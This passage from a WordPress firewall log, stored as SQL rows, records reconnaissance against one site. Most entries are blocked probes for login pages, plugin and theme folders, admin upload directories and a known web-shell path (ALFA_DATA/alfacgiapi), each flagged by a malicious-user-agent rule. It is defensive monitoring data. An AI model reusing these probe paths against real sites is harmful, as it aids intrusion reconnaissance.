User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134782,0.000000,1700248640.681321,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=e678b73f95','https://eckankar-colorado.org/wp-admin/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','logout',NULL,NULL),(134783,1700248691.635689,1700248691.627700,0x00000000000000000000FFFF55D1B0CC,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134763,1700247221.962614,1700247221.953600,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134790,1700274688.163151,1700274688.159200,0x00000000000000000000FFFF68FE5AFB,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt','http://eckankar-colorado.org/wp-content/plugins/royal-elementor-addons/readme.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb3lhbC1lbGVtZW50b3ItYWRkb25zL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134764,1700247210.900893,1700247210.891600,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134789,0.000000,1700273579.371346,0x00000000000000000000FFFF8B3BE898,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134781,1700247627.818924,1700247627.804700,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/.tmb/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly50bWIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134765,1700247281.613323,1700247281.591600,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/images/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133305,1699888651.644494,1699888651.635900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/admin/tmp/','http://eckankar-colorado.org/admin/tmp/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3RtcC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133301,1699888653.207691,1699888653.199100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/administrator/','http://eckankar-colorado.org/administrator/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluaXN0cmF0b3Iv\",\"category\":\"brute-force\",\"ssl\":1}'),(133306,1699888651.313600,1699888651.305000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/admin/images/slider/','http://eckankar-colorado.org/admin/images/slider/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2ltYWdlcy9zbGlkZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(133303,1699888652.308293,1699888652.297000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/Admin/uploads/','http://eckankar-colorado.org/Admin/uploads/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133300,1699888653.540282,1699888653.531600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/alfacgiapi/','http://eckankar-colorado.org/ALFA_DATA/alfacgiapi/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133304,1699888651.974852,1699888651.966100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/admin/uploads/','http://eckankar-colorado.org/admin/uploads/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133227,1699888685.628111,1699888685.605500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-diambar/includes/','http://eckankar-colorado.org/wp-content/plugins/wp-diambar/includes/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1kaWFtYmFyL2luY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133228,1699888685.283229,1699888685.273200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/Uwogh-Segs/','http://eckankar-colorado.org/wp-content/plugins/Uwogh-Segs/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Vd29naC1TZWdzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133360,1699888632.843938,1699888632.834800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-site-health.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-site-health.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXNpdGUtaGVhbHRoLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133358,1699888633.509147,1699888633.500200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-terms-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-terms-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXRlcm1zLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133406,1699888615.983687,1699888615.974800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-file-upload-upgrader.php','http://eckankar-colorado.org/wp-admin/includes/class-file-upload-upgrader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLWZpbGUtdXBsb2FkLXVwZ3JhZGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133213,1699888690.731081,1699888690.722400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml','http://eckankar-colorado.org/wp-content/uploads/simple-file-list/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133214,1699888690.400890,1699888690.391900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/zakra/','http://eckankar-colorado.org/wp-content/themes/zakra/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3pha3JhLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133170,1699888486.867366,1699888486.858600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-walker-page-dropdown.php','http://eckankar-colorado.org/wp-includes/class-walker-page-dropdown.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdhbGtlci1wYWdlLWRyb3Bkb3duLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133188,1699888480.498714,1699888480.337600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/category-template.php','http://eckankar-colorado.org/wp-includes/category-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NhdGVnb3J5LXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133219,1699888688.629586,1699888688.620100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/sketch/','http://eckankar-colorado.org/wp-content/themes/sketch/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3NrZXRjaC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133442,1699888600.798521,1699888600.789100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-image.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-image.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLWltYWdlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133441,1699888601.182689,1699888601.173900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-video.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-media-video.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LW1lZGlhLXZpZGVvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133343,1699888638.572276,1699888638.563400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/image-edit.php','http://eckankar-colorado.org/wp-admin/includes/image-edit.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2ltYWdlLWVkaXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133599,1699888540.062088,1699888540.046500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/media.php','http://eckankar-colorado.org/wp-includes/media.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 